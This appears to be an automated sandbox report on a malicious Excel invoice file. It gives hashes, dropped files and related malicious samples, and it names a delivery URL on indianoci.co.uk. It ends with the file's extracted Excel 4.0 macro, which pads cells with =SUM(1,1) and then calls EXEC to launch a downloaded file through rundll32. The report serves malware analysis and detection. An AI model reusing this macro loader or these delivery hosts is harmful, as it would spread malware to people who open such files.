Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 52.255.188.83, 104.43.139.144, 52.109.76.68, 52.109.8.25, 13.64.90.137, 20.50.102.62, 23.10.249.26, 23.10.249.43, 23.54.113.104, 20.82.210.154, 20.54.26.129, 23.54.113.53 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.189.4	invoice_2033853593_741382743.xlsm	Get hash	malicious	Browse	indianoci.co.uk/ufriends/support.php
	invoice_2033853593_741382743.xlsm	Get hash	malicious	Browse	indianoci.co.uk/ufriends/support.php
	invoice_942456281_2051221643.xlsm	Get hash	malicious	Browse	indianoci.co.uk/ufriends/support.php
	http://yheyg94gjv2o.ru	Get hash	malicious	Browse	yheyg94gjv2o.ru/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
indianoci.co.uk	invoice_2033853593_741382743.xlsm	Get hash	malicious	Browse	172.67.189.4
	invoice_2033853593_741382743.xlsm	Get hash	malicious	Browse	172.67.189.4
	invoice_853027014_428126518.xlsm	Get hash	malicious	Browse	104.21.43.238
	invoice_853027014_428126518.xlsm	Get hash	malicious	Browse	104.21.43.238
	invoice_942456281_2051221643.xlsm	Get hash	malicious	Browse	172.67.189.4
	invoice_942456281_2051221643.xlsm	Get hash	malicious	Browse	104.21.43.238

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	invoice_661434949_67552437.xlsm	Get hash	malicious	Browse	104.21.43.238
	reconocer PO #700-20 D462021,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	shipping document.exe	Get hash	malicious	Browse	162.159.129.233
	Statement-ID-(400603).vbs	Get hash	malicious	Browse	162.159.135.233
	setup-1.exe	Get hash	malicious	Browse	104.21.1.88
	Five.exe	Get hash	malicious	Browse	172.67.130.194
	setup.exe	Get hash	malicious	Browse	1.1.1.1
	SecuriteInfo.com.Trojan.DownLoader38.19635.27871.exe	Get hash	malicious	Browse	104.21.15.11
	SecuriteInfo.com.Trojan.DownloaderNET.151.23895.exe	Get hash	malicious	Browse	172.67.160.253
	Pd0Tb0v0WW.exe	Get hash	malicious	Browse	23.227.38.74
	Purchase Inquiry.xlsx	Get hash	malicious	Browse	172.67.83.132
	jEXf5uQ3DE.exe	Get hash	malicious	Browse	172.67.189.8
	giATspz5dw.exe	Get hash	malicious	Browse	104.21.55.148
	Tmd7W7qwQw.dll	Get hash	malicious	Browse	104.20.185.68
	9R5WtLGEAy.dll	Get hash	malicious	Browse	104.20.185.68
	6BympvyPAv.exe	Get hash	malicious	Browse	172.67.130.194
	#Ud83d#Udcde.htm	Get hash	malicious	Browse	104.16.18.94
	ghnrope2.dll	Get hash	malicious	Browse	104.20.185.68
	mail_6512365134_7863_202104108.html	Get hash	malicious	Browse	104.18.10.207
	Copia bancaria de swift.exe	Get hash	malicious	Browse	162.159.135.233

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\651B4591-EA57-4383-A1E3-6BA7A6B10F4A Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	133926
Entropy (8bit):	5.370325908538599
Encrypted:	false
SSDEEP:	1536:4cQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:/VQ9DQW+zYXO8
MD5:	F6A5092BE9E143221D9DA187B89031EA
SHA1:	DC0CFDABC3FF3BF9D2CAE81DC5DFE490B91BDABE
SHA-256:	8CE02001314F71667C5800F45F486B9222BB274972B541E59D5CF4B7B0D29FEA
SHA-512:	749633B47B754495E5BFB39C7691E2CCB210E54A2D3409AA58C42A30A31819BE34E91289457B69022717F5000C536928AA33B5D2DE74CBB1EA8195F619D8530D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-10T22:16:52">.. Build: 16.0.14008.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C8A93C31.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 756 x 756, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	169558
Entropy (8bit):	7.988183859518103
Encrypted:	false
SSDEEP:	3072:KTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGv:KrV4mnVqbTEnRMs
MD5:	2A06BF86C977F9A29739FD65CE53B5BE
SHA1:	33C88641A06413C919903497577EEA54ED03FAA0
SHA-256:	4C18B1BFA7CD6C6048A5637FF7F753B78435E70FAB6BA74125EC7D633F7A3F9F
SHA-512:	71E29BE3A7A31A7650892A599C88C99CB25BF4B60DD6172BAAF849036562E3E141605543FCACD9389D73B04535C270543B0B4D55272809EEA6ABFB2E3764D2C8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............4A....sRGB.........pHYs...t...t..f.x....IDATx^....,.U..WWwuu...ir..HBB.$...F".`..E.....k...mI.l.... l.3......$.d@Y.M.....+W}.g.....$#F..`.....C.[o..y...g.Wy....8....#P.<..G..J.....w...=..._+.2h4...AU.u....4/..,..w.U....d..aU.."...V+.2.j..U.._.....Z..]._.....<..A.^.......,+?/.f....H.._..y..:.i..}^S4..Ro+.z#.!.yK.U5.V.7.4.k.V...E.e..!DI\k6.Z.+J.^....j....=x=.+..Qo.y... /2...hfE...(..C..&..q.\.$l..^.F.?..E..>.^..z-HR..H.$l4.Z..U..5..O.(..c.7..4..r.z.v..[.Q..O.>.^......H..h...I4......c..._/..].j.Z....Q..Z..k._.;.....A.Zi.......7.Y...z..]..>pv..N2.IGEm.(.4I..a..m.9. .kU^U....E+h.y. 4.A.g..d.....J..Z.k.E.<_.U.8.......R..P.Wg...._.\|^.....z...e...\|..FL.>.O.L.zR...h.~PTE..3...IP.y3.../.......U!_Z."..}>..1s..S#..~.....L?O/...M...W-........h..u.J..Wd..$.Ye\|k..F..A..h4.,...Q.=N.j.........gUQ........E...q^\."k.L.Z....3j..b.ge. .\|&....{iQ$.F..1..4KZa.{.+S.9..F....5..Z. K..y...Y.'A...._.....q.^....EY......1-x.[.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\support[1].htm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	4318
Entropy (8bit):	4.967209600318077
Encrypted:	false
SSDEEP:	96:1j9jwIjYjyDK/DZD8jH+k1bwvJADh/pRsQsIszbGD:1j9jhjYjWK/lyH+kbwRADh/pmQsIsfGD
MD5:	16321A0C2074BEA9227884ABA9971E30
SHA1:	886A39B9C36D5BA00DEDA1BD30792635C73FA4B0
SHA-256:	7B2272F4480E7B05C23D52C6DABC5F37F36FA7BB48EA63A4FBB594FE5A024F60
SHA-512:	6B42A1F453E3CDF224D88C9CEE397F91946108841DF7262C907C95CD7FE3A316FACB0F1F3E2684C918ACC9B37BD326608FB71FAC3E76DDB9014B3942CED1ADF5
Malicious:	false
Reputation:	low
IE Cache URL:	http://indianoci.co.uk/ufriends/support.php
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

C:\Users\user\AppData\Local\Temp\24810000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	184339
Entropy (8bit):	7.96536778671128
Encrypted:	false
SSDEEP:	3072:gNTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGkz:gNrV4mnVqbTEnRMZ
MD5:	8580314383DFD8A39447DD3C93CA33BC
SHA1:	BAFCC418D47D7E430FF47609B964F5A1BE3444CE
SHA-256:	AAAA75B73BC2C8AA4DCBAF7D804998C1B1AB0E9B0883B550EF8613D17C4AB148
SHA-512:	C0D1DB87605D1ACF0EEFDAD8B92672AD961822819D5294DCB96E6ABA06B008EABA86DB54D0461A07283B30E3E0C5BE26734DAE8FCB1D7D6DCFADF81C8BA92619
Malicious:	false
Reputation:	low
Preview:	.U.N.0.._....E...t.....$..\{.X.K.....[z..AT6y9.1g...jaM....w-;kF..'..k...]..U..S.x.-[.......2.V.v.>.p.9......p.2..D...A...F.\z...:e.6...L..T.....Ip...W.e..i...9..j..!B0Z.D..7....l.%(/_-.i0D..{.dM..&...R.(p.f...D.94.,...O)...y.k...Z....Q+..EL..RZ\|a......f?I..b....).7V..o....5...=J.....~ ..#..\I!>...jdS...P..!..X&.n.^...Zh..ii...w+.C.........\|.>.CE.-.........z.> .......).]."..4l..-.Q.art.!Om.j.6/...?.......PK..........!.........f.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sun Apr 11 06:16:55 2021, atime=Sun Apr 11 06:16:55 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.630447272354785
Encrypted:	false
SSDEEP:	12:8XMmYXUhuElPCH2A4WYJuh8+WrjAZ/2bDaLC5Lu4t2Y+xIBjKZm:8XRK4uEAZiDD87aB6m
MD5:	829291B2038D409B9270168201F7E941
SHA1:	DB171763DC332EDB4FD1C3D72F4616E26D880320
SHA-256:	6F1978A9D5009A5046FEEEFB34C0B15272724281E3D091842B0F1F975D143A75
SHA-512:	6B7672A3C849E23191E9D0436BD807CC08EA52C6291E4CEDB8A773E2D1E429AD6ECA7DC70A2B48B56798553ABB75B95D4B0A87E95083178EF5E3D0B1E7C22EC6
Malicious:	false
Reputation:	low
Preview:	L..................F........N....-..k.J.....k.J...... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.:....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.:.....S.....................`..h.a.r.d.z.....~.1......R.:..Desktop.h.......Ny..R.:.....Y..............>.......5.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......536720...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	148
Entropy (8bit):	4.837648193517411
Encrypted:	false
SSDEEP:	3:oyBVomxWHnKb8W/g4dTSULE8W/g4dTSmxWHnKb8W/g4dTSv:dj0nKbNgQTpENgQTKnKbNgQTc
MD5:	0E1F08D229A4602AF5EEF4E92BABE78B
SHA1:	5BF6BE5FC7F62BF694A2AB180D0A2F3D30C4A91D
SHA-256:	ED1F65A34CF8DF1B1EF2A4B5E3E6DFC5008EBF428F0B6AB5F333BC1B70A7B82E
SHA-512:	41C316D73CBF6499480436226DF3192394AF0D4DC53CBAA4E9C59AF7363DD27FE970E4C04B8176ED5333B7C021777B5D28B19E6BCB7B189B2D0DFD60129BBE14
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[misc]..invoice_661434949_67552437.xlsm.LNK=0..invoice_661434949_67552437.xlsm.LNK=0..[misc]..invoice_661434949_67552437.xlsm.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\invoice_661434949_67552437.xlsm.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Sun Apr 11 06:16:55 2021, atime=Sun Apr 11 06:16:55 2021, length=184330, window=hide
Category:	dropped
Size (bytes):	2280
Entropy (8bit):	4.732266669477698
Encrypted:	false
SSDEEP:	48:8+eTwBB5aBwG5vB6p+eTwBB5aBwG5vB6:8d0BWBrBKd0BWBrB
MD5:	874ACF901353A710C040E3CD02659E57
SHA1:	9AE90F147E97013FC045BE829756701F29962EB5
SHA-256:	2702E0C79D524ED1DA7ECB6F2D80CC7E218957B0320CDF77DAB5ECC61668168F
SHA-512:	43994C67E28C42282D4E5688B0842DFF8827D72422BF11DC6653127748617C25DB95481F41F156EECCA0180CF0C0AF4D4F6D6CF9669E074EE379137862CC1010
Malicious:	true
Reputation:	low
Preview:	L..................F.... ...=...:...T.Q......\|O..................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.:....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.:.....S.....................`..h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..R.:.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.: .INVOIC~1.XLS..p......>Qvx.R.:....h.....................]1..i.n.v.o.i.c.e._.6.6.1.4.3.4.9.4.9._.6.7.5.5.2.4.3.7...x.l.s.m.......e...............-.......d...........>.S......C:\Users\user\Desktop\invoice_661434949_67552437.xlsm..6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.n.v.o.i.c.e._.6.6.1.4.3.4.9.4.9._.6.7.5.5.2.4.3.7...x.l.s.m.........:..,.LB.)...As...`.......X.......536720...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3

C:\Users\user\Desktop\B4810000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	184330
Entropy (8bit):	7.965430051359059
Encrypted:	false
SSDEEP:	3072:PNTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGkC:PNrV4mnVqbTEnRMU
MD5:	004C393BB1346D076AF52F46A4C8BCF1
SHA1:	A780758840385FAE166116047987157A7B5FF9F9
SHA-256:	4B6B8F913401F4EE53D01D86D12844D6AB4AA77B27E3D120BB76B4BADB34D983
SHA-512:	A5B29DD8664B1B522865C1C6B6336626339A569A4E7DB362CCED6B950846D11B407345E988625B800E9C9A25B9842F3295069D3F2A04BFEEFCFE190E2D9801E2
Malicious:	false
Reputation:	low
Preview:	.U.N.0.._....E...t.....$..\{.X.K.....[z..AT6y9.1g...jaM....w-;kF..'..k...]..U..S.x.-[.......2.V.v.>.p.9......p.2..D...A...F.\z...:e.6...L..T.....Ip...W.e..i...9..j..!B0Z.D..7....l.%(/_-.i0D..{.dM..&...R.(p.f...D.94.,...O)...y.k...Z....Q+..EL..RZ\|a......f?I..b....).7V..o....5...=J.....~ ..#..\I!>...jdS...P..!..X&.n.^...Zh..ii...w+.C.........\|.>.CE.-.........z.> .......).]."..4l..-.Q.art.!Om.j.6/...?.......PK..........!.........f.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$invoice_661434949_67552437.xlsm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtBhFXI6dtt:RJZhJ1
MD5:	836727206447D2C6B98C973E058460C9
SHA1:	D83351CF6DE78FEDE0142DE5434F9217C4F285D2
SHA-256:	D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
SHA-512:	7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\GVer.iks Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	HTML document, ASCII text
Category:	modified
Size (bytes):	4318
Entropy (8bit):	4.967209600318077
Encrypted:	false
SSDEEP:	96:1j9jwIjYjyDK/DZD8jH+k1bwvJADh/pRsQsIszbGD:1j9jhjYjWK/lyH+kbwRADh/pmQsIsfGD
MD5:	16321A0C2074BEA9227884ABA9971E30
SHA1:	886A39B9C36D5BA00DEDA1BD30792635C73FA4B0
SHA-256:	7B2272F4480E7B05C23D52C6DABC5F37F36FA7BB48EA63A4FBB594FE5A024F60
SHA-512:	6B42A1F453E3CDF224D88C9CEE397F91946108841DF7262C907C95CD7FE3A316FACB0F1F3E2684C918ACC9B37BD326608FB71FAC3E76DDB9014B3942CED1ADF5
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.965561623864126
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	invoice_661434949_67552437.xlsm
File size:	184803
MD5:	64f33ccbc7976306417b2b2528daa5fe
SHA1:	d71433580e83ab455556a88c483d1887e9641be6
SHA256:	03a7d4fc0e9d75fb98ca2aba43729acb93803959b1421d8878548643c12e3d73
SHA512:	f111800a5f1de2d2cec569448810eefd8999c99d9e78d5414b3bc662dbb607131a7a69f7236c929b769347d3430c9090c1144a3946c6a2d3d1d7d84236940ecf
SSDEEP:	3072:eSnTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMG9m:eSnrV4mnVqbTEnRML
File Content Preview:	PK..........!."..Z....f.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd0e2f696908c

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "invoice_661434949_67552437.xlsm"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,l,,l,..\GVer.iks,3"=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=EXEC(""rund""&G12&G13&G14&G15&"" ""&F14&"",StartW"")",,2,,=RETURN(),,

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,